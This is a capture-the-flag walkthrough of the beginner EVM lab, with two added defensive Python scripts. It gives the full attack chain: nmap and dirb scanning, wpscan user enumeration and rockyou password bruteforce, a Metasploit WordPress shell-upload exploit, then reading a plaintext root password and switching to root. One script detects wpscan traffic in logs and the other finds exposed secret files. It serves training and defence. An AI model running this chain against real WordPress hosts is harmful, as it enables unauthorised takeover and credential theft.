In this article, we will solve the EVM lab. This lab is designed by Ic0de and it is an easy lab, as the author intended it for beginners. You can download the lab from here.
Penetration Methodologies:
· Network Scanning
  o Netdiscover
  o Nmap Scan
· Enumeration
  o Browsing HTTP Service
  o Directory Bruteforce using dirb
  o Enumeration Using WPScan
  o Password Bruteforce using WPScan
  o Getting Login Credentials
· Exploitation
  o Exploiting using Metasploit
  o Getting a reverse connection
  o Spawning a TTY Shell
  o Enumeration for Root Credentials
· Privilege Escalation
  o Getting Login Credentials
  o Logging in as root
  o Reading the Final Flag
Walkthrough
Network Scanning
First we will find the IP address of our target machine. For that, use the following command, as it lists all the IPs in the internal network:
netdiscover
As you can see from the above image, our target IP is 192.168.1.103. Now that we know the target IP, we can move on to scanning it, so that step by step we can attack further and gain control of the machine; scanning will help us find an opening. We will scan with the help of nmap, and for that use the following command:
nmap -A 192.168.1.103
With the help of nmap we observed that ports 22, 53, 80, 110, 139, 143 and 445 are open, running SSH, DNS, HTTP, POP3, NETBIOS, IMAP and NETBIOS respectively.
Enumeration
As port 80 is open, let us try opening the IP in a browser, as shown in the image below:
The default Apache webpage opens, which is normal except for the fact that there is a comment saying “you can find me at /wordpress/ im vulnerable 😊”
According to this comment, there is a vulnerable directory called ‘wordpress’. To confirm this we used the dirb command:
dirb http://192.168.1.103/
And to no surprise, there is a directory called ‘wordpress’. Since this is WordPress, as the name suggests, we can use wpscan to find out more about it. For this, type:
wpscan --url http://192.168.1.103/wordpress/ -e at -e ap -e u
With this command we are telling wpscan to enumerate (-e) all themes (at) and all plugins (ap) installed on the WordPress site, and finally all the users (u) that exist on the WordPress site.
As you can see in the image below, wpscan found a user named c0rrupt3d_brain, whose password we can attack via bruteforce in order to log in.
So, for our bruteforce, we will use the rockyou wordlist. To put it in action, type:
wpscan --url http://192.168.1.103/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt
When the bruteforce is successful, it gives you the password, i.e. 24992499, as shown in the image below:
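From the defender's side, the two wpscan runs above leave a very recognisable trace in the web server's access log: a burst of author/REST user lookups followed by many POSTs to wp-login.php from one address in a short time. The script below is an added example, not part of the original walkthrough, that parses Apache combined-format log lines and flags both behaviours. The log lines are constructed for the example (the scanner address 192.168.1.50, the timestamps and the WPScan User-Agent string are all made up); the thresholds are assumptions you would tune for your own site. It keys on request patterns rather than the User-Agent, since a scanner's User-Agent can be changed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Requests that WordPress user enumeration (wpscan -e u) relies on.
ENUM_PATTERNS = (
    re.compile(r"[?&]author=\d+"),        # /?author=N redirects to /author/<login>/
    re.compile(r"/wp-json/wp/v2/users"),  # REST API lists post authors
)
LOGIN_RE = re.compile(r"/wp-login\.php$")


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def max_in_window(times, window):
    """Largest number of timestamps that fall inside any sliding window of length `window`."""
    times = sorted(times)
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyze(log_text, enum_threshold=2, login_threshold=5, window_seconds=60):
    """Return {ip: {...}} for source addresses whose traffic looks like WordPress
    user enumeration or a wp-login.php password bruteforce (thresholds are assumptions)."""
    enum_hits = defaultdict(int)
    logins = defaultdict(list)          # ip -> [(timestamp, status), ...]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        if rec["method"] == "GET" and any(p.search(path) for p in ENUM_PATTERNS):
            enum_hits[rec["ip"]] += 1
        elif rec["method"] == "POST" and LOGIN_RE.search(path.split("?", 1)[0]):
            logins[rec["ip"]].append((rec["ts"], rec["status"]))

    alerts = defaultdict(dict)
    for ip, n in enum_hits.items():
        if n >= enum_threshold:
            alerts[ip]["user_enumeration"] = n
    for ip, attempts in logins.items():
        burst = max_in_window([t for t, _ in attempts], timedelta(seconds=window_seconds))
        if burst >= login_threshold:
            alerts[ip]["login_bruteforce"] = burst
            # WordPress re-renders the form (200) on a wrong password and redirects (302)
            # on success, so a 302 inside a bruteforce burst means a guess landed.
            alerts[ip]["possible_success"] = any(s == 302 for _, s in attempts)
    return dict(alerts)


# Constructed sample log (not captured from the lab) imitating the traffic described above.
_ATTACKER = "192.168.1.50"
_UA = "WPScan v3.7.0"   # constructed; wpscan names itself in the User-Agent by default
_lines = [
    f'{_ATTACKER} - - [10/Oct/2019:10:00:01 +0000] "GET /wordpress/?author=1 HTTP/1.1" 301 0 "-" "{_UA}"',
    f'{_ATTACKER} - - [10/Oct/2019:10:00:01 +0000] "GET /wordpress/?author=2 HTTP/1.1" 404 0 "-" "{_UA}"',
    f'{_ATTACKER} - - [10/Oct/2019:10:00:02 +0000] "GET /wordpress/wp-json/wp/v2/users/ HTTP/1.1" 200 512 "-" "{_UA}"',
]
# Eight password guesses within eight seconds; the last one is answered with a redirect.
_lines += [
    f'{_ATTACKER} - - [10/Oct/2019:10:00:{5 + i:02d} +0000] "POST /wordpress/wp-login.php HTTP/1.1" '
    f'{302 if i == 7 else 200} 3123 "-" "{_UA}"'
    for i in range(8)
]
_lines.append('192.168.1.77 - - [10/Oct/2019:10:03:00 +0000] "GET /wordpress/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"')
SAMPLE_LOG = "\n".join(_lines)

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info)
```

Run against a real access log with `analyze(open("/var/log/apache2/access.log").read())`; the ordinary visitor at 192.168.1.77 is never reported, while the scanner address is flagged for both enumeration and the login burst, with `possible_success` set because of the 302.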
Exploitation
Now that we know the username and password, we can use a built-in WordPress exploit from Metasploit. First, start Metasploit by typing ‘msfconsole’ and then type the following commands:
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.1.103
set targeturi /wordpress
set username c0rrupt3d_brain
set password 24992499
exploit
Once the exploit has run and the attack is successful, you will have your meterpreter session. In the meterpreter session, go to home by typing cd /home and check what home has to offer with the ls command. There was only one folder there, named root3r; navigate to that folder and list its files with the same command as before. Here you will find the file .root_password_ssh.txt; reading this text file with cat gives you the password of the root user, as shown in the image below:
cd /home
ls
cd root3r
ls
cat .root_password_ssh.txt
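The finding that makes the rest of the walkthrough possible is a plaintext root password sitting in a user's home directory, readable by the account the web shell runs as (an assumption; the page does not state the file's permissions, but the step above could not have worked otherwise). The script below is an added example, not part of the original walkthrough, of the check a defender would run on such a host: walk the home directories, pick out files whose names suggest stored secrets, and report any that are readable by group or others. It generalises beyond the lab's single file to SSH private keys, .netrc and .pgpass files. The directory layout it scans is built in a temporary directory with placeholder contents, constructed for the example.

```python
import os
import re
import stat
import tempfile

# Path fragments that suggest a stored secret. A constructed, non-exhaustive list.
SECRET_NAME_RE = re.compile(
    r"(passw(or)?d|secret|credential|\.ssh/id_[a-z0-9]+$|\.netrc$|\.pgpass$)", re.I
)
GROUP_OR_WORLD_READ = stat.S_IRGRP | stat.S_IROTH


def scan_home_dirs(base="/home"):
    """Return [(path, octal_mode)] for regular files under `base` whose relative path
    suggests a secret and that are readable by group or others (anything beyond 0600)."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(base):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, base)
            if not SECRET_NAME_RE.search(rel):
                continue
            try:
                st = os.lstat(path)
            except OSError:
                continue                     # vanished or unreadable metadata
            if not stat.S_ISREG(st.st_mode):
                continue                     # skip symlinks, sockets, etc.
            mode = stat.S_IMODE(st.st_mode)
            if mode & GROUP_OR_WORLD_READ:
                findings.append((path, oct(mode)))
    return findings


def build_demo_tree():
    """Create a throwaway directory imitating the lab's /home layout (constructed data)."""
    base = tempfile.mkdtemp(prefix="evm-home-")
    user = os.path.join(base, "root3r")
    os.makedirs(os.path.join(user, ".ssh"))

    leaked = os.path.join(user, ".root_password_ssh.txt")
    with open(leaked, "w") as f:
        f.write("placeholder-not-the-real-password\n")
    os.chmod(leaked, 0o644)       # world-readable: this is the finding

    key = os.path.join(user, ".ssh", "id_rsa")
    with open(key, "w") as f:
        f.write("placeholder private key\n")
    os.chmod(key, 0o600)          # correctly locked down: must not be reported

    notes = os.path.join(user, "notes.txt")
    with open(notes, "w") as f:
        f.write("nothing sensitive\n")
    os.chmod(notes, 0o644)        # readable, but the name suggests no secret
    return base


if __name__ == "__main__":
    demo = build_demo_tree()
    for path, mode in scan_home_dirs(demo):
        print(f"{mode} {path}")
```

On a real host run `scan_home_dirs("/home")` as root so every directory is traversable; anything it prints should either be moved out of the home directory (for example into a root-only file or a secrets manager) or at least chmod'ed to 0600 and owned by the user it belongs to.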
Privilege Escalation
Now we know that the password of the root user is willy26. We can switch our user to root; for this, type:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
su root
willy26
Now you are logged in as root, with all its privileges, as you can see in the image below:
Once you are logged in as the root user, navigate to the root folder by typing cd /root. When you use the ls command there, you will find a proof.txt document. Reading it with the cat command shows that you have successfully pwned the machine. YAY!!!!!!